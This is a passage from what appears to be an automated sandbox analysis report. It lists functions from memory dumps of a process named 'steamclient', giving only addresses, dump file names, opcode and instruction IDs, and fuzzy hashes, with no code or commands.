                                                                    • Opcode Fuzzy Hash: 4a660926753a8bfb327cd3da07225f6433a19e843931e924d9a56568e4c86461
                                                                    • Instruction Fuzzy Hash: 54014F31E0E7899FD712EBB4886459D7FB0AF0A314F1941E3D055DB2A6ED38AA44C741
                                                                    Function 00007FFD9B8857AF Relevance: .0, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b880000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ceaa50d4aa67770186724bc6618f0c841c2af3e7bd88d1a09b355e4eefac0e65
                                                                    • Instruction ID: 0b1ba5438f1d572b675fa56e07967ba92ea907b69eeb7606e6006f598e662a21
                                                                    • Opcode Fuzzy Hash: ceaa50d4aa67770186724bc6618f0c841c2af3e7bd88d1a09b355e4eefac0e65
                                                                    • Instruction Fuzzy Hash: 49F03070A0D51E47E7A5A2849461BE83360EF4D300F5180B4D65DD72E2CE386E418755
                                                                    Function 00007FFD9B8A8825 Relevance: .0, Instructions: 25COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b8a1000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: f46482d079eb13d1b637b3aa1ae29f44a82c414d8c2113ecb215344158962125
                                                                    • Instruction ID: aa50354a86dc17075f182fc0bb34ed8335d50bef8db5afeac628f2cbe8db1a44
                                                                    • Opcode Fuzzy Hash: f46482d079eb13d1b637b3aa1ae29f44a82c414d8c2113ecb215344158962125
                                                                    • Instruction Fuzzy Hash: 66E0862195F7DD4ED72367A84C710D8BF30EE0A140B4902E7D098860A3ED09575983D2
                                                                    Function 00007FFD9B88070D Relevance: .0, Instructions: 24COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b880000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 46c542f411cd7fc460b8dc0752ec280611870e1076386a40890dddeee3d250d1
                                                                    • Instruction ID: 3ff2c31390fc17c9f12b6d52dd373bdfadd0e778e30030895fd326056b8447a1
                                                                    • Opcode Fuzzy Hash: 46c542f411cd7fc460b8dc0752ec280611870e1076386a40890dddeee3d250d1
                                                                    • Instruction Fuzzy Hash: 4AD08C00F6BC0F42E47533F928260BC72409F8CB14FD30132D02C800EAAC6F22850553
                                                                    Function 00007FFD9B8AF200 Relevance: .0, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B8A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A1000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b8a1000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                    • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                    • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                    • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                    Function 00007FFD9B8945F8 Relevance: .0, Instructions: 16COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b890000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0a28e7623893d77e9a3d712774a573256d4433bb8a6d29f62b194fd02ba282c8
                                                                    • Instruction ID: 6523d0c966f62d7ba960a08d03e93c1c475acd49cdce847f00036827dfffc2ec
                                                                    • Opcode Fuzzy Hash: 0a28e7623893d77e9a3d712774a573256d4433bb8a6d29f62b194fd02ba282c8
                                                                    • Instruction Fuzzy Hash: B6D05E20B0E80F8BFEB6AF989C607B92690BF0C305F0A0578E50EC31F6DD68E9015601
                                                                    Function 00007FFD9B881BB0 Relevance: .0, Instructions: 14COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b880000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 5aed10bb81f0f6b705e8d924a26448956ffa6ad39147f1e80df6d8165d9fa489
                                                                    • Instruction ID: d5bbfe4b10a4d3dd751f313c3d39c7803e672e4aee4f14f22133f410ba2ed9c8
                                                                    • Opcode Fuzzy Hash: 5aed10bb81f0f6b705e8d924a26448956ffa6ad39147f1e80df6d8165d9fa489
                                                                    • Instruction Fuzzy Hash: 80C01230611C0C8FCA48EB28C8A4D1473A0FB5D304B9A0094E00DCB2B1E62AECC2CB40
                                                                    Function 00007FFD9B880730 Relevance: .0, Instructions: 8COMMON
                                                                    Download Yara Rule
                                                                    Memory Dump Source
                                                                    • Source File: 0000002F.00000002.3104701560.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_47_2_7ffd9b880000_steamclient.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 88a0c4741b636eb5f01c4778584042cc197c8b71ee4301ca202ebb54c21d0eff
                                                                    • Instruction ID: 44331a71233abc01103b0d9bf3697ecb26d23aa150dc3a8fc41ef4968729d7a1
                                                                    • Opcode Fuzzy Hash: 88a0c4741b636eb5f01c4778584042cc197c8b71ee4301ca202ebb54c21d0eff
                                                                    • Instruction Fuzzy Hash: C8B01200D97C0F02D43433F519560647000AFCC200FC20570E418C00A5DC6E12940242